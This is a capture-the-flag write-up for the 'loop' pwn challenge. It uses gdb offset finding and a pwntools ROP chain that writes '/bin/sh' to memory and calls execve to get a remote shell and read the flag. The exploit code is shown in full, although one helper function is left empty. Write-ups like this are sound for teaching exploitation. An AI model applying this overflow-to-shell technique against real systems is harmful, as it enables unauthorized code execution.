Tags: pwn syscall 


## Loop Solution

Testing some initial input, we realize we can influence both RAX and \[RSP\], after 33 and 73 bytes respectively.

pwndbg> cyclic 100
pwndbg> r
Starting program: /root/workspace/loop
The end is the beginning, and the beginning is the end

Program received signal SIGSEGV, Segmentation fault.

pwndbg> x/s $rsp
0x7fffffffe648: "aaataaauaaavaaawaaaxaaayaaa\n"
pwndbg> x/s $rax
0x6b6161616a616161: <error: Cannot access memory at address 0x6b6161616a616161>
pwndbg> cyclic -l aaat
pwndbg> cyclic -l 0x6a616161

Since the binary uses syscalls(), we should be able to construct our own syscalls to execve(). However, since the binary does not have a "/bin/sh" string, we will need to write one to memory ourselves. Luckily, there is a writable region of memory mapped at 0x666000.

00401000 int64_t _start() __noreturn

00401000 {
00401019 syscall(sys_write {1}, 1, "The end is the beginning, and th…", 0x37);
00401042 syscall(sys_mmap {9}, 0x666000, 0x1000, 3, 0x22, 0xffffffff, 0);
0040104b trial();
0040105a syscall(sys_exit {0x3c}, 0);
0040105a /* no return */
0040105a }

There are a couple syscalls() calls in the binary. Since we will need to perform both a SYS_read and SYS_execve, picking the right one proves important. We can reuse the syscall used for the earlier SYS_mmap since, it immediately enters the main trial() function afterwards. This will allow us to perform a second overflow.

0040103d b809000000 mov eax, 0x9
00401042 0f05 syscall
00401044 48c7c3ffffffff mov rbx, 0xffffffffffffffff
0040104b e810000000 call trial
00401050 bf00000000 mov edi, 0x0
00401055 b83c000000 mov eax, 0x3c
0040105a 0f05 syscall


Putting it together, we will:
- syscall(SYS_exec, path=data, argv=0, envp=0)
- send "/bin/sh\0\n"
- syscall(SYS_read, fd=0x0, buf=data, len=9)

Our final exploit follows:

from pwn import *
import time

e = context.binary = ELF("./loop")
p = remote('0.cloud.chals.io', 34997)
r = ROP(e)

pop_rdi = p64((r.find_gadget(['pop rdi', 'ret']))[0])
pop_rsi = p64((r.find_gadget(['pop rsi', 'ret']))[0])
pop_rdx = p64((r.find_gadget(['pop rdx', 'ret']))[0])
syscall = p64(0x401042)
data = 0x666000

def write_rax(rax):
'''33 bytes to write rax, 73 bytes to overflow [rsp]'''
return cyclic(33)+p64(rax)+cyclic(32)

def sys_exec():
'''syscall(SYS_exec, path=*data, argv=0, envp=0)'''
pad = write_rax(constants.SYS_execve)
chain = pop_rdi
chain += p64(data)
chain += pop_rsi
chain += p64(0x0)
chain += pop_rdx
chain += p64(0x0)
chain += syscall
p.sendline(pad + chain)

def sys_read():
'''syscall(SYS_read, fd=0x0, buf=*data, len=9)'''
pad = write_rax(constants.SYS_read)
chain = pop_rdi
chain += p64(0x0)
chain += pop_rsi
chain += p64(data)
chain += pop_rdx
chain += p64(0x9)
chain += syscall
p.sendline(pad + chain)

def send_sh():
'''send "/bin/sh"'''


Running it gives us a shell and we can read the flag.

~/workspace $ python3 pwn-loop.py

[+] Opening connection to 0.cloud.chals.io on port 34997: Done
[*] Loaded 6 cached gadgets for './loop'
[*] Switching to interactive mode
The end is the beginning, and the beginning is the end
Proceed? (y/n): Proceed? (y/n): $ whoami
$ cat /home/loop/flag.txt

Original writeup (https://github.com/tj-oconnor/ctf-writeups/tree/main/ctf_24hr/Pwn-Loop).